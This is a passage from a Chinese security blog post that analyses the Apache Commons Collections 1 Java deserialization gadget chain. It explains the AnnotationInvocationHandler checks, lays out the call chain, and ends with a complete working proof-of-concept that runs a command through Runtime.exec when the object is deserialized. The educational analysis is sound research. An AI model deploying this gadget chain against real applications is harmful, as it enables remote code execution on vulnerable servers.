<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RuntimeReflect</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                new InvokerTransformer("getMethod",new Class[]&#123;String.class,Class[].class&#125;,new Object[]&#123;"getRuntime",null&#125;),</span><br><span class="line">                new InvokerTransformer("invoke",new Class[]&#123;Object.class,Object[].class&#125;,new Object[]&#123;null, null&#125;),</span><br><span class="line">                new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;),</span><br><span class="line"></span><br><span class="line">        &#125;;</span><br><span class="line">        Transformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">      	chainedTransformer.transform(Runtime<span class="class">.<span class="keyword">class</span>)</span>;</span><br><span class="line">      </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="Target-class"><a href="#Target-class" class="headerlink" title="Target.class"></a>Target.class</h5><p>接着我们继续修改两个if判断的问题。在第一个if之前首先会遍历我们传入的map并将key赋给name，此时我们拿到的name就是在map中put的<code>key</code>，之后会通过<code>memberTypes.get</code>方法获取name，将值赋给memberType。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/17.png" alt="17"></p>
<p>由于我们现在传入的是<code>Override.class</code>，在<code>Override</code>中并没有存在成员方法，因此在get的时候就拿不到任何值，所以得到的<code>memberType</code>就为空。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/18.png" alt="18"></p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/20.png" alt="20"></p>
<p>因此我们需要找一个有成员方法的class，并将map传入的<code>key</code>值改为成员方法的名字，才可以进入第一层if判断，所以我们使用<code>Target.class</code>代替，并将<code>map.put</code>的<code>key</code>值改为<code>value</code></p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/19.png" alt="19"></p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/21.png" alt="21"></p>
<p>在第二个判断语句中使用<code>isInstance</code>判断是否可以强转，这个判断很明显是<code>false</code>,取反之后正好可以让我们进入第二层if判断，从而执行<code>setValue</code>方法</p>
<h5 id="ConstantTransformer"><a href="#ConstantTransformer" class="headerlink" title="ConstantTransformer"></a>ConstantTransformer</h5><p>现在我们接着解决上面的第一个问题，就是需要将<code>setValue</code>中的代理替换成我们的<code>Runtime.class</code>，可以通过<code>ConstantTransformer</code>实现。前面讲到了<code>ConstantTransformer</code>的<code>transform</code>方法接收一个输入并返回一个常量，因此我们只需要传入<code>Runtime.class</code>即可</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/22.png" alt="22"></p>
<h4 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Gadget chain:</span><br><span class="line">	ObjectInputStream.readObject()</span><br><span class="line">		AnnotationInvocationHandler.readObject()</span><br><span class="line">			Map.Entry.setValue()</span><br><span class="line">			  TransformedMap.checkSetValue()</span><br><span class="line">						ChainedTransformer.transform()</span><br><span class="line">							ConstantTransformer.transform()</span><br><span class="line">							InvokerTransformer.transform()</span><br><span class="line">								Method.invoke()</span><br><span class="line">									Class.getMethod()</span><br><span class="line">							InvokerTransformer.transform()</span><br><span class="line">								Method.invoke()</span><br><span class="line">									Runtime.getRuntime()</span><br><span class="line">							InvokerTransformer.transform()</span><br><span class="line">								Method.invoke()</span><br><span class="line">									Runtime.exec()</span><br></pre></td></tr></table></figure>
<h4 id="最终poc"><a href="#最终poc" class="headerlink" title="最终poc"></a>最终poc</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Hashtable;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">cc1Test</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line"></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line">                new InvokerTransformer("getMethod",new Class[]&#123;String.class,Class[].class&#125;,new Object[]&#123;"getRuntime",null&#125;),</span><br><span class="line">                new InvokerTransformer("invoke",new Class[]&#123;Object.class,Object[].class&#125;,new Object[]&#123;null,null&#125;),</span><br><span class="line">                new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;),</span><br><span class="line">        &#125;;</span><br><span class="line">        Transformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">       HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br><span class="line">       map.put(<span class="string">"value"</span>,<span class="string">"aaa"</span>);</span><br><span class="line">       Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(map,<span class="keyword">null</span>,chainedTransformer);</span><br><span class="line"></span><br><span class="line">       Class c = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">       Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Class<span class="class">.<span class="keyword">class</span>,<span class="title">Map</span>.<span class="title">class</span>)</span>;</span><br><span class="line">       annotationInvocationhdlConstructor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">       Object o = annotationInvocationhdlConstructor.newInstance(Target<span class="class">.<span class="keyword">class</span>,<span class="title">transformedMap</span>)</span>;</span><br><span class="line">       serialize(o);</span><br><span class="line">       unserialize(<span class="string">"ser.bin"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> IOException</span>&#123;</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span class="string">"ser.bin"</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">unserialize</span><span class="params">(String  Filename)</span> <span class="keyword">throws</span> IOException,ClassNotFoundException</span>&#123;</span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(Filename));</span><br><span class="line">        Object obj = ois.readObject();</span><br><span class="line">        <span class="keyword">return</span> obj;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h4><ul>
<li><a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java" target="_blank" rel="noopener">https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java</a></li>
<li><a href="http://diego.team/2021/02/04/java-cc1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90/" target="_blank" rel="noopener">http://diego.team/2021/02/04/java-cc1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90/</a></li>
<li><a href="https://paper.seebug.org/1242/" target="_blank" rel="noopener">https://paper.seebug.org/1242/</a></li>
<li><a href="https://www.buaq.net/go-75937.html" target="_blank" rel="noopener">https://www.buaq.net/go-75937.html</a></li>
<li><a href="https://mp.weixin.qq.com/s?__biz=MzI0MjgyNDA5NQ==&amp;mid=2247483715&amp;idx=1&amp;sn=bda48a95891b8a4533fbe1535d1ac75b&amp;chksm=e97727b3de00aea5e21cfa1407e669da095fed826733265e0beb93107e434178b8329f6cfe32&amp;token=1359929470&amp;lang=zh_CN#rd" target="_blank" rel="noopener">https://mp.weixin.qq.com/s?__biz=MzI0MjgyNDA5NQ==&amp;mid=2247483715&amp;idx=1&amp;sn=bda48a95891b8a4533fbe1535d1ac75b&amp;chksm=e97727b3de00aea5e21cfa1407e669da095fed826733265e0beb93107e434178b8329f6cfe32&amp;token=1359929470&amp;lang=zh_CN#rd</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Java/" rel="tag"># Java</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/10/25/Kubernetes安全/" rel="next" title="Kubernetes安全">
                <i class="fa fa-chevron-left"></i> Kubernetes安全
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/10/30/Java类加载/" rel="prev" title="Java类加载">
                Java类加载 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/author1.png" alt="elssm">
            
              <p class="site-author-name" itemprop="name">elssm</p>
              <p class="site-description motion-element" itemprop="description">web安全 对抗攻击 go/python</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">68</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/elssm" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-globe"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://elssm.lofter.com" target="_blank" title="Lofter">
                      
                        <i class="fa fa-fw fa-globe"></i>Lofter</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Apache-Commons-Collections"><span class="nav-number">1.</span> <span class="nav-text">Apache Commons Collections</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#复现环境"><span class="nav-number">2.</span> <span class="nav-text">复现环境</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#IDEA配置"><span class="nav-number">2.1.</span> <span class="nav-text">IDEA配置</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#一个简单反射例子"><span class="nav-number">3.1.</span> <span class="nav-text">一个简单反射例子</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#从Trnsformer看起"><span class="nav-number">3.2.</span> <span class="nav-text">从Trnsformer看起</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#InvokerTransformer"><span class="nav-number">3.3.</span> <span class="nav-text">InvokerTransformer</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#TransformedMap"><span class="nav-number">3.4.</span> <span class="nav-text">TransformedMap</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#MapEntry"><span class="nav-number">3.5.</span> <span class="nav-text">MapEntry</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#jdk源码关联"><span class="nav-number">3.6.</span> <span class="nav-text">jdk源码关联</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#AnnotationInvocationHandler"><span class="nav-number">3.7.</span> <span class="nav-text">AnnotationInvocationHandler</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#遇到的三个问题"><span class="nav-number">3.8.</span> <span class="nav-text">遇到的三个问题</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#反射调用Runtime"><span class="nav-number">3.9.</span> <span class="nav-text">反射调用Runtime</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ChainedTransformer"><span class="nav-number">3.10.</span> <span class="nav-text">ChainedTransformer</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Target-class"><span class="nav-number">3.11.</span> <span class="nav-text">Target.class</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ConstantTransformer"><span class="nav-number">3.12.</span> <span class="nav-text">ConstantTransformer</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#调用链"><span class="nav-number">4.</span> <span class="nav-text">调用链</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#最终poc"><span class="nav-number">5.</span> <span class="nav-text">最终poc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考链接"><span class="nav-number">6.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">elssm</span>

  
</div>






  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a></div>



<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->



  


  




	





  





  












  





  

  

  

  
  

  
  


  

  

</body>
</html>
